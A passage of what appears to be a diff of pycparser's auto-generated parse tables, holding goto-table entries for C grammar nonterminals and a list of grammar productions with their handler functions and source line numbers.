,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,487,158,158,158,158,158,158,158,158,158,158,487,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,]),'atomic_specifier':([0,1,21,27,40,52,53,55,59,63,75,85,87,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[27,63,87,63,111,63,63,63,27,63,87,111,63,111,87,111,111,27,27,111,111,87,111,111,111,111,111,111,111,111,111,27,87,111,111,27,27,27,87,27,]),'struct_declarator_list':([192,],[320,]),'empty':([0,1,4,21,27,35,40,52,53,55,63,75,87,89,91,117,118,128,129,177,181,192,204,206,211,218,220,227,278,282,298,307,342,419,421,422,427,429,437,440,459,460,472,488,499,502,513,515,533,535,537,539,550,553,566,569,574,577,],[57,64,83,88,64,106,115,64,64,64,64,88,64,83,115,106,208,106,208,277,306,321,337,106,277,337,106,377,415,106,433,433,415,337,337,415,433,433,433,433,106,208,522,522,433,433,337,106,433,433,433,433,522,433,433,433,433,433,]),'parameter_declaration':([118,129,278,342,350,422,460,],[210,210,210,210,463,210,210,]),'primary_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,
161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,]),'declaration':([0,21,59,75,93,181,298,427,],[38,90,38,90,182,302,302,499,]),'declaration_specifiers_no_type':([0,1,21,27,52,53,55,59,63,75,87,93,118,129,181,278,298,342,350,422,427,460,],[40,67,91,67,67,67,67,40,67,91,67,91,214,214,91,214,91,214,214,214,91,214,]),'jump_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[303,303,303,303,303,303,303,303,303,303,303,303,303,]),'enumerator_list':([102,193,194,],[196,325,326,]),'block_item':([181,298,],[305,432,]),'constant_expression':([85,116,297,319,329,373,447,],[159,203,431,444,451,471,509,]),'identifier_list_opt':([118,129,460,],[207,221,516,]),'constant':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,]),'type_specifier_no_typeid':([0,4,21,40,59,75,85,89,91,93,95,99,118,129,172,174,177,181,184,185,186,192,211,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[12,71,12,12,12,12,12,71,12,12,12,12,12,12,12,12,275,12,12,12,12,275,71,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,]),'struct_declaration':([99,184,185,186,313,315,],[190,190,190,318,318,318,]),'direct_typeid_noparen_declarator':([211,344,],[345,458,]),'id_declarator':([0,4,37,40,59,69,89,91,126,192,202,211,342,445,],[21,75,107,110,21,107,179,110,179,179,179,346,107,179,]),'selection_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[308,308,308,308,308,308,308,308,308,308,308,308,308,]),'postfix_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,]),'initializer_list':([227,488,],[374,528,]),'unary_operator':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,]),'struct_or_union':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,29
8,313,315,342,350,422,427,460,],[31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,]),'block_item_list_opt':([181,],[309,]),'assignment_expression':([131,174,181,201,204,218,229,231,233,258,265,266,290,298,307,338,339,353,354,364,375,412,419,421,427,429,430,434,437,440,441,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[228,272,272,228,335,335,272,272,272,272,272,408,272,272,272,455,456,466,467,468,228,486,335,335,272,272,272,272,272,272,272,525,272,272,335,228,272,272,272,272,272,561,562,272,272,272,272,272,272,]),'designation_opt':([227,472,488,550,],[375,521,375,521,]),'parameter_type_list':([118,129,278,342,422,460,],[209,222,416,416,416,517,]),'type_qualifier_list':([35,85,95,99,117,128,174,184,185,186,206,220,229,231,233,239,267,282,313,315,459,515,],[103,172,172,172,205,219,172,172,172,172,103,103,172,172,172,172,172,103,172,172,514,103,]),'designator':([227,376,472,488,550,],[371,474,371,371,371,]),'id_init_declarator_list_opt':([40,91,],[114,114,]),'declaration_specifiers':([0,21,59,75,93,118,129,181,278,298,342,350,422,427,460,],[4,89,4,89,89,211,211,89,211,89,211,211,211,89,211,]),'identifier_list':([118,129,460,],[212,212,212,]),'declaration_list_opt':([21,75,],[92,130,]),'function_definition':([0,59,],[45,45,]),'binary_expression':([85,116,131,174,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,419,421,427,429,430,434,437,440,441,447,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[162,162,162,162,162,162,162,162,162,162,162,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,162,400,401,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,]),'enum_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,]),'decl_body':([0,21,59,75,93,181,298,427,],[51,51,51,51,51,51,51,51,]),'function_specifier':([0,1,4,21,27,52,53,55,59,63,75,87,89,93,118,129,181,211,278,298,342,350,422,427,460,],[55,55,82,55,55,55,55,55,55,55,55,55,82,55,55,55,55,82,55,55,55,55,55,55,55,]),'specifier_qualifier_list':([85,95,99,174,184,185,186,229,231,233,239,267,313,315,],[177,177,192,177,192,192,192,177,177,177,177,177,192,192,]),'conditional_expression':([85,116,131,174,181,201,204,218,229,231,233,258,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,419,421,427,429,430,434,437,440,441,447,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[178,178,225,225,225,225,225,225,225,225,225,225,225,225,225,178,225,225,178,178,225,225,225,225,225,178,225,225,225,225,225,225,225,225,225,225,225,178,524,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,]),} + +_lr_goto = {} +for _k, _v in _lr_goto_items.items(): + for _x, _y in zip(_v[0], _v[1]): + if not _x in _lr_goto: _lr_goto[_x] = {} + _lr_goto[_x][_k] = _y +del _lr_goto_items +_lr_productions = [ + ("S' -> translation_unit_or_empty","S'",1,None,None,None), + ('abstract_declarator_opt -> empty','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',43), + ('abstract_declarator_opt -> 
abstract_declarator','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',44), + ('assignment_expression_opt -> empty','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',43), + ('assignment_expression_opt -> assignment_expression','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',44), + ('block_item_list_opt -> empty','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',43), + ('block_item_list_opt -> block_item_list','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',44), + ('declaration_list_opt -> empty','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',43), + ('declaration_list_opt -> declaration_list','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',44), + ('declaration_specifiers_no_type_opt -> empty','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',43), + ('declaration_specifiers_no_type_opt -> declaration_specifiers_no_type','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',44), + ('designation_opt -> empty','designation_opt',1,'p_designation_opt','plyparser.py',43), + ('designation_opt -> designation','designation_opt',1,'p_designation_opt','plyparser.py',44), + ('expression_opt -> empty','expression_opt',1,'p_expression_opt','plyparser.py',43), + ('expression_opt -> expression','expression_opt',1,'p_expression_opt','plyparser.py',44), + ('id_init_declarator_list_opt -> empty','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',43), + ('id_init_declarator_list_opt -> id_init_declarator_list','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',44), + ('identifier_list_opt -> empty','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',43), + ('identifier_list_opt -> identifier_list','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',44), + ('init_declarator_list_opt -> empty','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',43), + ('init_declarator_list_opt -> init_declarator_list','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',44), + ('initializer_list_opt -> empty','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',43), + ('initializer_list_opt -> initializer_list','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',44), + ('parameter_type_list_opt -> empty','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',43), + ('parameter_type_list_opt -> parameter_type_list','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',44), + ('struct_declarator_list_opt -> empty','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',43), + ('struct_declarator_list_opt -> struct_declarator_list','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',44), + ('type_qualifier_list_opt -> empty','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',43), + ('type_qualifier_list_opt -> type_qualifier_list','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',44), + ('direct_id_declarator -> ID','direct_id_declarator',1,'p_direct_id_declarator_1','plyparser.py',126), + ('direct_id_declarator -> LPAREN id_declarator RPAREN','direct_id_declarator',3,'p_direct_id_declarator_2','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt 
RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_3','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',127), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_5','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LPAREN parameter_type_list RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LPAREN identifier_list_opt RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',127), + ('direct_typeid_declarator -> TYPEID','direct_typeid_declarator',1,'p_direct_typeid_declarator_1','plyparser.py',126), + ('direct_typeid_declarator -> LPAREN typeid_declarator RPAREN','direct_typeid_declarator',3,'p_direct_typeid_declarator_2','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_3','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',127), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_5','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LPAREN parameter_type_list RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',127), + ('direct_typeid_noparen_declarator -> TYPEID','direct_typeid_noparen_declarator',1,'p_direct_typeid_noparen_declarator_1','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_3','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',127), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_5','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN 
parameter_type_list RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',127), + ('id_declarator -> direct_id_declarator','id_declarator',1,'p_id_declarator_1','plyparser.py',126), + ('id_declarator -> pointer direct_id_declarator','id_declarator',2,'p_id_declarator_2','plyparser.py',126), + ('typeid_declarator -> direct_typeid_declarator','typeid_declarator',1,'p_typeid_declarator_1','plyparser.py',126), + ('typeid_declarator -> pointer direct_typeid_declarator','typeid_declarator',2,'p_typeid_declarator_2','plyparser.py',126), + ('typeid_noparen_declarator -> direct_typeid_noparen_declarator','typeid_noparen_declarator',1,'p_typeid_noparen_declarator_1','plyparser.py',126), + ('typeid_noparen_declarator -> pointer direct_typeid_noparen_declarator','typeid_noparen_declarator',2,'p_typeid_noparen_declarator_2','plyparser.py',126), + ('translation_unit_or_empty -> translation_unit','translation_unit_or_empty',1,'p_translation_unit_or_empty','c_parser.py',509), + ('translation_unit_or_empty -> empty','translation_unit_or_empty',1,'p_translation_unit_or_empty','c_parser.py',510), + ('translation_unit -> external_declaration','translation_unit',1,'p_translation_unit_1','c_parser.py',518), + ('translation_unit -> translation_unit external_declaration','translation_unit',2,'p_translation_unit_2','c_parser.py',524), + ('external_declaration -> function_definition','external_declaration',1,'p_external_declaration_1','c_parser.py',534), + ('external_declaration -> declaration','external_declaration',1,'p_external_declaration_2','c_parser.py',539), + ('external_declaration -> pp_directive','external_declaration',1,'p_external_declaration_3','c_parser.py',544), + ('external_declaration -> pppragma_directive','external_declaration',1,'p_external_declaration_3','c_parser.py',545), + ('external_declaration -> SEMI','external_declaration',1,'p_external_declaration_4','c_parser.py',550), + ('external_declaration -> static_assert','external_declaration',1,'p_external_declaration_5','c_parser.py',555), + ('static_assert -> _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN','static_assert',6,'p_static_assert_declaration','c_parser.py',560), + ('static_assert -> _STATIC_ASSERT LPAREN constant_expression RPAREN','static_assert',4,'p_static_assert_declaration','c_parser.py',561), + ('pp_directive -> PPHASH','pp_directive',1,'p_pp_directive','c_parser.py',569), + ('pppragma_directive -> PPPRAGMA','pppragma_directive',1,'p_pppragma_directive','c_parser.py',575), + ('pppragma_directive -> PPPRAGMA PPPRAGMASTR','pppragma_directive',2,'p_pppragma_directive','c_parser.py',576), + ('function_definition -> id_declarator declaration_list_opt compound_statement','function_definition',3,'p_function_definition_1','c_parser.py',586), + ('function_definition -> declaration_specifiers id_declarator declaration_list_opt compound_statement','function_definition',4,'p_function_definition_2','c_parser.py',604), + ('statement -> labeled_statement','statement',1,'p_statement','c_parser.py',619), + ('statement -> expression_statement','statement',1,'p_statement','c_parser.py',620), + ('statement -> compound_statement','statement',1,'p_statement','c_parser.py',621), + ('statement -> selection_statement','statement',1,'p_statement','c_parser.py',622), + 
('statement -> iteration_statement','statement',1,'p_statement','c_parser.py',623), + ('statement -> jump_statement','statement',1,'p_statement','c_parser.py',624), + ('statement -> pppragma_directive','statement',1,'p_statement','c_parser.py',625), + ('statement -> static_assert','statement',1,'p_statement','c_parser.py',626), + ('pragmacomp_or_statement -> pppragma_directive statement','pragmacomp_or_statement',2,'p_pragmacomp_or_statement','c_parser.py',674), + ('pragmacomp_or_statement -> statement','pragmacomp_or_statement',1,'p_pragmacomp_or_statement','c_parser.py',675), + ('decl_body -> declaration_specifiers init_declarator_list_opt','decl_body',2,'p_decl_body','c_parser.py',694), + ('decl_body -> declaration_specifiers_no_type id_init_declarator_list_opt','decl_body',2,'p_decl_body','c_parser.py',695), + ('declaration -> decl_body SEMI','declaration',2,'p_declaration','c_parser.py',755), + ('declaration_list -> declaration','declaration_list',1,'p_declaration_list','c_parser.py',764), + ('declaration_list -> declaration_list declaration','declaration_list',2,'p_declaration_list','c_parser.py',765), + ('declaration_specifiers_no_type -> type_qualifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_1','c_parser.py',775), + ('declaration_specifiers_no_type -> storage_class_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_2','c_parser.py',780), + ('declaration_specifiers_no_type -> function_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_3','c_parser.py',785), + ('declaration_specifiers_no_type -> atomic_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_4','c_parser.py',792), + ('declaration_specifiers_no_type -> alignment_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_5','c_parser.py',797), + ('declaration_specifiers -> declaration_specifiers type_qualifier','declaration_specifiers',2,'p_declaration_specifiers_1','c_parser.py',802), + ('declaration_specifiers -> declaration_specifiers storage_class_specifier','declaration_specifiers',2,'p_declaration_specifiers_2','c_parser.py',807), + ('declaration_specifiers -> declaration_specifiers function_specifier','declaration_specifiers',2,'p_declaration_specifiers_3','c_parser.py',812), + ('declaration_specifiers -> declaration_specifiers type_specifier_no_typeid','declaration_specifiers',2,'p_declaration_specifiers_4','c_parser.py',817), + ('declaration_specifiers -> type_specifier','declaration_specifiers',1,'p_declaration_specifiers_5','c_parser.py',822), + ('declaration_specifiers -> declaration_specifiers_no_type type_specifier','declaration_specifiers',2,'p_declaration_specifiers_6','c_parser.py',827), + ('declaration_specifiers -> declaration_specifiers alignment_specifier','declaration_specifiers',2,'p_declaration_specifiers_7','c_parser.py',832), + ('storage_class_specifier -> AUTO','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',837), + ('storage_class_specifier -> REGISTER','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',838), + ('storage_class_specifier -> STATIC','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',839), + ('storage_class_specifier -> EXTERN','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',840), + 
('storage_class_specifier -> TYPEDEF','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',841), + ('storage_class_specifier -> _THREAD_LOCAL','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',842), + ('function_specifier -> INLINE','function_specifier',1,'p_function_specifier','c_parser.py',847), + ('function_specifier -> _NORETURN','function_specifier',1,'p_function_specifier','c_parser.py',848), + ('type_specifier_no_typeid -> VOID','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',853), + ('type_specifier_no_typeid -> _BOOL','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',854), + ('type_specifier_no_typeid -> CHAR','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',855), + ('type_specifier_no_typeid -> SHORT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',856), + ('type_specifier_no_typeid -> INT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',857), + ('type_specifier_no_typeid -> LONG','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',858), + ('type_specifier_no_typeid -> FLOAT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',859), + ('type_specifier_no_typeid -> DOUBLE','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',860), + ('type_specifier_no_typeid -> _COMPLEX','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',861), + ('type_specifier_no_typeid -> SIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',862), + ('type_specifier_no_typeid -> UNSIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',863), + ('type_specifier_no_typeid -> __INT128','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',864), + ('type_specifier -> typedef_name','type_specifier',1,'p_type_specifier','c_parser.py',869), + ('type_specifier -> enum_specifier','type_specifier',1,'p_type_specifier','c_parser.py',870), + ('type_specifier -> struct_or_union_specifier','type_specifier',1,'p_type_specifier','c_parser.py',871), + ('type_specifier -> type_specifier_no_typeid','type_specifier',1,'p_type_specifier','c_parser.py',872), + ('type_specifier -> atomic_specifier','type_specifier',1,'p_type_specifier','c_parser.py',873), + ('atomic_specifier -> _ATOMIC LPAREN type_name RPAREN','atomic_specifier',4,'p_atomic_specifier','c_parser.py',879), + ('type_qualifier -> CONST','type_qualifier',1,'p_type_qualifier','c_parser.py',886), + ('type_qualifier -> RESTRICT','type_qualifier',1,'p_type_qualifier','c_parser.py',887), + ('type_qualifier -> VOLATILE','type_qualifier',1,'p_type_qualifier','c_parser.py',888), + ('type_qualifier -> _ATOMIC','type_qualifier',1,'p_type_qualifier','c_parser.py',889), + ('init_declarator_list -> init_declarator','init_declarator_list',1,'p_init_declarator_list','c_parser.py',894), + ('init_declarator_list -> init_declarator_list COMMA init_declarator','init_declarator_list',3,'p_init_declarator_list','c_parser.py',895), + ('init_declarator -> declarator','init_declarator',1,'p_init_declarator','c_parser.py',903), + ('init_declarator -> declarator EQUALS initializer','init_declarator',3,'p_init_declarator','c_parser.py',904), + ('id_init_declarator_list -> id_init_declarator','id_init_declarator_list',1,'p_id_init_declarator_list','c_parser.py',909), + ('id_init_declarator_list -> id_init_declarator_list COMMA 
init_declarator','id_init_declarator_list',3,'p_id_init_declarator_list','c_parser.py',910), + ('id_init_declarator -> id_declarator','id_init_declarator',1,'p_id_init_declarator','c_parser.py',915), + ('id_init_declarator -> id_declarator EQUALS initializer','id_init_declarator',3,'p_id_init_declarator','c_parser.py',916), + ('specifier_qualifier_list -> specifier_qualifier_list type_specifier_no_typeid','specifier_qualifier_list',2,'p_specifier_qualifier_list_1','c_parser.py',923), + ('specifier_qualifier_list -> specifier_qualifier_list type_qualifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_2','c_parser.py',928), + ('specifier_qualifier_list -> type_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_3','c_parser.py',933), + ('specifier_qualifier_list -> type_qualifier_list type_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_4','c_parser.py',938), + ('specifier_qualifier_list -> alignment_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_5','c_parser.py',943), + ('specifier_qualifier_list -> specifier_qualifier_list alignment_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_6','c_parser.py',948), + ('struct_or_union_specifier -> struct_or_union ID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','c_parser.py',956), + ('struct_or_union_specifier -> struct_or_union TYPEID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','c_parser.py',957), + ('struct_or_union_specifier -> struct_or_union brace_open struct_declaration_list brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_2','c_parser.py',967), + ('struct_or_union_specifier -> struct_or_union brace_open brace_close','struct_or_union_specifier',3,'p_struct_or_union_specifier_2','c_parser.py',968), + ('struct_or_union_specifier -> struct_or_union ID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','c_parser.py',985), + ('struct_or_union_specifier -> struct_or_union ID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','c_parser.py',986), + ('struct_or_union_specifier -> struct_or_union TYPEID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','c_parser.py',987), + ('struct_or_union_specifier -> struct_or_union TYPEID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','c_parser.py',988), + ('struct_or_union -> STRUCT','struct_or_union',1,'p_struct_or_union','c_parser.py',1004), + ('struct_or_union -> UNION','struct_or_union',1,'p_struct_or_union','c_parser.py',1005), + ('struct_declaration_list -> struct_declaration','struct_declaration_list',1,'p_struct_declaration_list','c_parser.py',1012), + ('struct_declaration_list -> struct_declaration_list struct_declaration','struct_declaration_list',2,'p_struct_declaration_list','c_parser.py',1013), + ('struct_declaration -> specifier_qualifier_list struct_declarator_list_opt SEMI','struct_declaration',3,'p_struct_declaration_1','c_parser.py',1021), + ('struct_declaration -> SEMI','struct_declaration',1,'p_struct_declaration_2','c_parser.py',1059), + ('struct_declaration -> pppragma_directive','struct_declaration',1,'p_struct_declaration_3','c_parser.py',1064), + ('struct_declarator_list -> struct_declarator','struct_declarator_list',1,'p_struct_declarator_list','c_parser.py',1069), + ('struct_declarator_list -> struct_declarator_list COMMA 
struct_declarator','struct_declarator_list',3,'p_struct_declarator_list','c_parser.py',1070), + ('struct_declarator -> declarator','struct_declarator',1,'p_struct_declarator_1','c_parser.py',1078), + ('struct_declarator -> declarator COLON constant_expression','struct_declarator',3,'p_struct_declarator_2','c_parser.py',1083), + ('struct_declarator -> COLON constant_expression','struct_declarator',2,'p_struct_declarator_2','c_parser.py',1084), + ('enum_specifier -> ENUM ID','enum_specifier',2,'p_enum_specifier_1','c_parser.py',1092), + ('enum_specifier -> ENUM TYPEID','enum_specifier',2,'p_enum_specifier_1','c_parser.py',1093), + ('enum_specifier -> ENUM brace_open enumerator_list brace_close','enum_specifier',4,'p_enum_specifier_2','c_parser.py',1098), + ('enum_specifier -> ENUM ID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','c_parser.py',1103), + ('enum_specifier -> ENUM TYPEID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','c_parser.py',1104), + ('enumerator_list -> enumerator','enumerator_list',1,'p_enumerator_list','c_parser.py',1109), + ('enumerator_list -> enumerator_list COMMA','enumerator_list',2,'p_enumerator_list','c_parser.py',1110), + ('enumerator_list -> enumerator_list COMMA enumerator','enumerator_list',3,'p_enumerator_list','c_parser.py',1111), + ('alignment_specifier -> _ALIGNAS LPAREN type_name RPAREN','alignment_specifier',4,'p_alignment_specifier','c_parser.py',1122), + ('alignment_specifier -> _ALIGNAS LPAREN constant_expression RPAREN','alignment_specifier',4,'p_alignment_specifier','c_parser.py',1123), + ('enumerator -> ID','enumerator',1,'p_enumerator','c_parser.py',1128), + ('enumerator -> ID EQUALS constant_expression','enumerator',3,'p_enumerator','c_parser.py',1129), + ('declarator -> id_declarator','declarator',1,'p_declarator','c_parser.py',1144), + ('declarator -> typeid_declarator','declarator',1,'p_declarator','c_parser.py',1145), + 